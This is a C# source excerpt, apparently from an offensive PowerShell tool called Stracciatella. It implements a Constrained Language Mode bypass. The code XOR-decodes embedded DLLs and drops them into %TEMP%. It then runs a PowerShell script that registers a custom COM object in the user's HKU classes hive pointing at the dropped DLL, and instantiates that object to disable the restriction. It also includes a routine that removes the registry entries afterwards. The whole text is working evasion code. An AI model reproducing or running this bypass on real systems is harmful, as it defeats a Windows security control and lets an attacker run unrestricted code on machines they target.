public static bool ProperDisable(PowerShell rs, CustomPSHost host)
{
if (DisableClm.Verbose)
{
Console.WriteLine("[.] Step 0. Plant DLL files in: %TEMP%");
}
using (BinaryWriter file = new BinaryWriter(File.Open(
Environment.ExpandEnvironmentVariables(OUTPUT_CLMDISABLEASSEMBLY_PATH),
FileMode.Create)))
{
byte[] data = Decoder.XorDecodeBinary(ClmEmbeddedFiles.ClmDisableAssemblyData, ClmEmbeddedFiles.FilesXorKey);
file.Write(data);
}
using (BinaryWriter file = new BinaryWriter(File.Open(
Environment.ExpandEnvironmentVariables(OUTPUT_CLMDISABLEDLL_PATH),
FileMode.Create)))
{
byte[] data = Decoder.XorDecodeBinary(ClmEmbeddedFiles.ClmDisableDllData, ClmEmbeddedFiles.FilesXorKey);
file.Write(data);
}
if (DisableClm.Verbose)
{
Console.WriteLine("[.] Step 1. Creating custom COM object.");
}
if (!CreateCOM(rs, host))
{
if (DisableClm.Verbose)
{
Console.WriteLine("[-] Could not register custom COM object. CLM bypass failed.");
}
return(false);
}
if (DisableClm.Verbose)
{
Console.WriteLine("[.] Step 2. Invoking it...");
}
if (DisableClm.Verbose)
{
Stracciatella.ExecuteCommand($"New-Object -ComObject {COM_NAME}", rs, host, true, true, false);
}
System.Threading.Thread.Sleep(1000);
return(true);
}
private static bool CreateCOM(PowerShell rs, CustomPSHost host, bool deregister = false)
{
string dllPath = @"$($Env:Temp)\ClmDisableDll.dll";
// Well I'm to lazy to reimplement it in C#
string registerCOM = @"
$sid = (whoami /user | select-string -Pattern ""(S-1-5[0-9-]+)"" -all | select -ExpandProperty Matches).value;
New-PSDrive -PSProvider Registry -Name HKU -Root HKEY_USERS;
$key = 'HKU:\{0}_classes' -f $sid;
$key = 'HKU:\{0}_classes\CLSID\' -f $sid;
New-Item -Force -Path $key -Name """ + COM_GUID + @""";
$key = 'HKU:\{0}_classes\CLSID\{1}' -f $sid, """ + COM_GUID + @""";
New-Item -Force -Path $key -Name 'InProcServer32';
New-ItemProperty -Force -Path $key -Name '(Default)' -Value """ + COM_DESCRIPTION + @""" -PropertyType String;
$key = 'HKU:\{0}_classes\CLSID\{1}\InProcServer32' -f $sid, """ + COM_GUID + @""";
New-ItemProperty -Force -Path $key -Name '(Default)' -Value """ + dllPath + @""" -PropertyType String;
New-ItemProperty -Force -Path $key -Name 'ThreadingModel' -Value ""Apartment"" -PropertyType String;
$key = 'HKU:\{0}_classes' -f $sid;
New-Item -Force -Path $key -Name """ + COM_NAME + @""";
$key = 'HKU:\{0}_classes\{1}' -f $sid, """ + COM_NAME + @""";
New-ItemProperty -Force -Path $key -Name '(Default)' -Value """ + COM_DESCRIPTION + @""" -PropertyType String;
New-Item -Force -Path $key -Name 'CLSID';
$key = 'HKU:\{0}_classes\{1}\CLSID' -f $sid, """ + COM_NAME + @""";
New-ItemProperty -Force -Path $key -Name '(Default)' -Value """ + COM_GUID + @""" -PropertyType String;
";
string deregisterCOM = @"
$sid = (whoami /user | select-string -Pattern ""(S-1-5[0-9-]+)"" -all | select -ExpandProperty Matches).value;
New-PSDrive -PSProvider Registry -Name HKU -Root HKEY_USERS | out-null
$key = 'HKU:\{0}_classes\{1}' -f $sid, """ + COM_NAME + @""";
Remove-Item -Force -Path $key -Recurse | out-null
$key = 'HKU:\{0}_classes\CLSID\{1}' -f $sid, """ + COM_GUID + @""";
Remove-Item -Force -Path $key -Recurse | out-null
";
if (deregister)
{
return(Stracciatella.ExecuteCommand(deregisterCOM, rs, host, true, true).Length > 0);
}
else
{
return(Stracciatella.ExecuteCommand(registerCOM, rs, host, true, true).Length > 0);
}
}
